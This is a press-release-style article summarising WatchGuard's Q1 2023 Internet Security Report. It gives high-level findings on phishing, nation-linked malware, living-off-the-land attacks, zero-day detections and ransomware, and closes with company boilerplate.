WatchGuard Technologies, a global leader in unified cybersecurity, has released its latest Internet Security Report, which highlights the top malware trends and network and endpoint security threats observed by the company’s Threat Lab researchers in the first quarter of 2023. The report unveils several key findings, including the increased use of browser-based social engineering strategies by phishers, the emergence of new malware linked to nation states, a rise in living-off-the-land attacks, and the prevalence of zero-day malware.
One of the notable trends identified in the report is the shift by attackers towards browser notifications as a means of social engineering. With web browsers implementing more robust protections against pop-up abuse, phishers have adapted their tactics to exploit browser notifications. Another interesting discovery from the top malicious domains list is the emergence of SEO-poisoning activity in a new destination.
The report also reveals that threats originating from China and Russia account for 75% of the new threats featured in the top ten list for Q1 2023. While these threats have strong ties to nation states, it is important to note that this does not necessarily imply state-sponsored activity. An example highlighted in the report is the Zusy malware family, which makes its debut in the top 10 malware list for this quarter. One variant of Zusy specifically targets China’s population with adware that installs a compromised browser, allowing the attackers to hijack the system’s Windows settings and use it as the default browser.
Persistence of attacks against Office products and the End-of-Life (EOL) Microsoft ISA Firewall is another concerning trend identified in the report. Threat Lab analysts observed document-based threats targeting Office products as the most widespread malware in the quarter. Additionally, there was a relatively high number of exploits against Microsoft’s now-discontinued firewall, the ISA Server. It is surprising to see attackers targeting a product that has long been discontinued without updates, highlighting the need for organizations to remain vigilant and ensure adequate security measures are in place.
Living-off-the-land attacks are on the rise according to the report. The analysis of the ViperSoftX malware in the DNS data for Q1 demonstrates how attackers are leveraging built-in tools provided by operating systems to achieve their objectives. These reports consistently highlight the prevalence of Microsoft Office- and PowerShell-based malware, emphasizing the importance of endpoint protection that can distinguish between legitimate and malicious use of popular tools such as PowerShell.
Furthermore, the report exposes the use of malware droppers targeting Linux-based systems as one of the top malware detections by volume in Q1. This underscores the need for organizations to not overlook Linux and macOS systems, even though Windows remains dominant in the enterprise space. Implementing Endpoint Detection and Response (EDR) that covers non-Windows machines is crucial for ensuring comprehensive coverage across the entire environment.
In terms of detection methods, the report highlights that the majority of detections in Q1 were attributed to zero-day malware. Approximately 70% of detections were related to zero-day malware transmitted over unencrypted web traffic, while a staggering 93% were from zero-day malware transmitted over encrypted web traffic. This emphasizes the significance of robust host-based defenses like WatchGuard EPDR (Endpoint Protection Detection and Response) to safeguard IoT devices, misconfigured servers, and other vulnerable devices.
The report also provides valuable insights based on the tracking of ransomware data. In Q1 2023, the Threat Lab identified 852 victims published on extortion sites and discovered 51 new ransomware variants. These ransomware groups continue to target numerous well-known organizations and companies, including Fortune 500 companies. WatchGuard plans to release more findings on ransomware tracking and analysis in their future reports.
Corey Nachreiner, Chief Security Officer at WatchGuard, highlights the importance of maintaining active and ongoing attention to security solutions and strategies. He emphasizes the need for layered malware defenses to combat living-off-the-land attacks effectively. By implementing a unified security platform managed by dedicated service providers, organizations can ensure a simple and efficient approach to protecting themselves against increasingly sophisticated threats.
As part of WatchGuard’s Unified Security Platform approach, the quarterly Internet Security Report offers anonymized and aggregated threat intelligence gathered from active WatchGuard network and endpoint products. This data is voluntarily shared by the owners of these products to support WatchGuard’s research efforts.
For this Q1 2023 analysis, the Threat Lab team has enhanced the methods used to normalize, analyze, and present the report findings. Unlike previous reports that primarily presented global total volumes, the network security results for this quarter and future reports will be presented as “per device” averages for all reporting network appliances. The report includes a detailed explanation of this evolution and the reasoning behind the updated methodology. It also provides additional insights into malware, network, and ransomware trends from Q1 2023, along with recommended security strategies and critical defense tips for businesses of all sizes and across industries.
To gain a more comprehensive understanding of WatchGuard’s research, interested individuals can access the complete Q1 2023 Internet Security Report on their website.
WatchGuard Technologies, Inc. is a leading global provider of unified cybersecurity solutions. Its Unified Security Platform approach is specifically designed for managed service providers to deliver world-class security, enhancing their business scale and velocity while improving operational efficiency. Trusted by over 17,000 security resellers and service providers, WatchGuard protects more than 250,000 customers worldwide. The company’s portfolio includes network security and intelligence, advanced endpoint protection, multi-factor authentication, and secure Wi-Fi solutions. These offerings encompass comprehensive security, shared knowledge, clarity & control, operational alignment, and automation – the five critical elements of a reliable security platform. Headquartered in Seattle, Washington, WatchGuard maintains offices across North America, Europe, Asia Pacific, and Latin America.
For additional information, promotions, and updates, individuals can follow WatchGuard on Twitter, Facebook, and LinkedIn. They can also visit the InfoSec blog, Secplicity, for real-time information about the latest threats and ways to mitigate them. Additionally, WatchGuard offers a podcast called “The 443 – Security Simplified” available on their website and other popular podcast platforms.
WatchGuard Technologies, Inc. holds the registered trademark for the WatchGuard name. All other trademarks mentioned in the report are the property of their respective owners.